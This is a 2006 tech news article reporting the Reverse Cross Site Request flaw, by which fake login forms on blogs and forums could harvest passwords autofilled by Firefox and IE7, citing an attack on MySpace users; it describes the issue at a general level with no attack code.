Firefox and IE7 vulnerable to password-stealing attack

MySpace targetted

Firefox and IE7 vulnerable to password-stealing attack. Software, Online, Browsers, Firefox, Internet Explorer, MySpace 0

23 November 2006 13:03 GMT / By Stuart Miles

Firefox 2 and Microsoft's Internet Explorer 7 web browsers are vulnerable to a flaw that could allow attackers to steal passwords it has been found.

Called the Reverse Cross Site Request vulnerability (RCSR) by its discoverer Robert Chapin, the flaw allows attackers to get users passwords and usernames by presenting them with a fake login form.

Firefox Password Manager will automatically enter any saved passwords and usernames into the form which it seems is part of the problem.

The Password Manager component of Firefox can be exploited to send a username and password combination to an attacker's computer without the user's knowledge.

"This may be a new breed of phishing attack unique to websites with user-contributed HTML", said Chapin on a Mozilla bug reporting site.

According to Chapin, "Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum websites at trusted addresses".

According to Chapin, Microsoft already knows about the issue and is "aware of the issue".

Before you resist from using the Internet at all, for the attack to work the user to follow a malicious link or form button.

"Webmasters have little recourse against stopping the attacks from happening. The only effective measure would be to remove all

elements in user-contributed HTML", Chapin said.

An exploit for this flaw has already been seen on social networking site MySpace. A recent large-scale attack using RCSR targeted the social networking site's users and was first reported by Netcraft 27/10/2006. That incident involved fake login forms on the MySpace website inviting users to type in their username and password.

The bad news is that the vulnerability could affect anyone using a blog or forum that allows user-generated HTML code to be added, according to Chapin.

More information can be found on the link below.

Related
Full tags
Software, Online, Browsers, Firefox, Internet Explorer, MySpace
UK Shopping
Amazon.co.uk, play.com, pixmania.co.uk, Currys.co.uk, Dixons.co.uk, 7dayshop.com, ebay.co.uk
US Shopping
Amazon.com, bestbuy.com, ebay.com

share Subscribe to RSS feeds email story save story print story pdf

Comments

(Will not be published)

  (Next time sign in to bypass captcha)

Latest in Software

Latest on Pocket-lint

Top 10 Broadband

Compare 50+
broadband packages

Home Broadband »

Pocket-lint poll

Q. Do you use the same password for everything?

Vote YES Vote NO

» LAST TIME
When asked Do you check emails, twitter or surf the internet in the loo? 65% said yes and 35% said no

About Pocket-lint

Pocket-lint is your one stop shop for gadgets, technology and consumer electronics, bringing you the low-down on the latest televisions, cameras, phones, GPS and much more. Whether it's learning about what's hot in the world of Apple, finding out about the latest home cinema kit from Samsung and Sony or merely seeing what not to buy, we have you covered. So check out our reviews, news, comment, hands-on photo galleries and videos. Enjoy.

Top products

tip us on news

reviews hub

Rss feed

Follow us on Twitter